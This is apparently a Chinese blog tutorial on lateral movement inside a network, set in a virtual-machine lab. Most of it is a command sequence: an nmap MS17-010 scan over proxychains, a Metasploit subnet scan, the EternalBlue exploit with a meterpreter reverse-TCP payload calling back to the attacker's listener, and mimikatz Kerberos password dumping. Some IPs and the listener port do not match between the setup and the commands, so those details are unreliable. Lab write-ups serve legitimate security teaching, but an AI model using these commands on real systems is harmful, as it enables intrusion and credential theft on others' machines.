【内网横向移动】使用nmap 和msfconsole 进行ms17_010漏洞扫描及利用

实验环境:

攻击(攻击者)主机:          :

Kali2020.2    虚拟机      

                   

192.168.254.132                               

目标(跳板机)主机:        

Windows2008 虚拟机          

Nat    

vmnet1       

192.168.254.176                               

192.168.10.12                                      

目标主机

Windows2007 虚拟机

Vmnet1

192.168.10.11  

nmap

查看漏洞探测的脚本,

【命令】

cd /usr/share/nmap/script //进入脚本目录下
ls | grep vuln   //查找vuln漏洞脚本,找到ms17-010漏洞脚本

 

使用smb-vuln-ms17-010.nse对192.168.10.12进行漏洞扫描,出现以下界面说明有漏洞,

【命令】这里使用的是socks进行代理进行连接的:

proxychains nmap -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.10.12
//使用smb-vuln-ms17-010.nse对192.168.10.12进行漏洞扫描,出现以下界面说明有漏洞

 

 

 

msfconsole 

 

查看漏洞扫描模块:

【命令】

proxychains msfconsole   //使用proxychains代理启动msfconsole
search scanner或search 17_010  //search搜索相应的模块

代理服务器已经开启了,

 

进行漏洞探测,

【命令】

use auxiliary/scanner/smb/smb_ms17_010  //使用smb_ms17_010模块
show options //查看需要设置的选项
set rhosts 192.168.10.1/24  //对整个ip段进行扫描
set threads 10  //设置线程,这里为10个线程
exploit   //开始进行扫描

 

使用攻击模式进行攻击,

【命令】

use exploit/windows/smb/ms17_010_eternalblue  //使用ms17_010_eternalblue攻击模块进行攻击
set payload windows/x64/meterpreter/reverse_tcp  //使用攻击载荷
set rhost 172.16.10.11   //内网中的另一台主机win7,一般win7旗舰版可以攻击成功
set lhost 192.168.100.128  //设置本机监听
set lport 555  //设置本机监听端口为5555
exploit  //进行攻击
//注意,攻击成功会返回目标主机的meterpreter 的shell权限,获得meterpreter后,进行以下操作:
getuid   // 查看当前用户
load mimikatz   //加载mimikaz
mimikatz_command   //使用mimikaz
kerberos   //使用kerberos可以对系统密码进行抓取
//单独输入一个?可以查看用法

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值